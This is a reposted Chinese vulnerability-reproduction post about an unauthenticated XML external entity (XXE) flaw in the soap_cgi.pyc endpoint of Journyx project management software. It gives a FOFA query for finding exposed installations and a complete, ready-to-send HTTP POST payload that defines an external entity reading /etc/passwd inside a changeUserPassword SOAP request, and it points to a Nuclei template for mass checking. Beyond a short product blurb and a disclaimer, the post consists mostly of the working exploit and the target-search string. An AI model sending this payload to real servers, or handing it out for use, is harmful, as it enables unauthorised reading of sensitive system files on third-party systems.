Journyx项目管理软件 soap_cgi.pyc XXE漏洞PoC

admin 2024年8月12日16:38:43评论48 views字数 907阅读3分1秒阅读模式

 

0x02

产品介绍

Journyx-Journyx成立于1996年,提供自托管项目管理解决方案ProjectXecute。主要功能包括资源跟踪、待办事项列表、任务分配以及与MS Project的集成。要运行ProjectXecute,需要Windows 2003或更高版本、IIS Web服务器和Intel处理器。也可以在Linux、Solaris、AIS和FreeBSD操作系统上运行此软件。
0x03

漏洞威胁

Journyx项目管理软件 soap_cgi.pyc 接口存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。
0x04

漏洞环境

FOFA:

body="Journyx"

Journyx项目管理软件 soap_cgi.pyc XXE漏洞PoC

0x05

漏洞复现

PoC

POST /jtcgi/soap_cgi.pyc HTTP/1.1Host: User-Agent:Mozilla/5.0 (WindowsNT10.0;Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko)Chrome/96.0.4664.93Safari/537.36Content-Type: application/xml<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM "file:///etc/passwd">]><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><changeUserPassword><username>&test;</username><curpwd>zzz</curpwd><newpwd>zzz123</newpwd></changeUserPassword></soapenv:Body></soapenv:Envelope>

Journyx项目管理软件 soap_cgi.pyc XXE漏洞PoC

0x06

批量脚本验证

Nuclei验证脚本已发布

原文始发于微信公众号(冷漠安全):「漏洞复现」Journyx项目管理软件 soap_cgi.pyc XXE漏洞

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月12日16:38:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Journyx项目管理软件 soap_cgi.pyc XXE漏洞PoChttps://cn-sec.com/archives/3058072.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息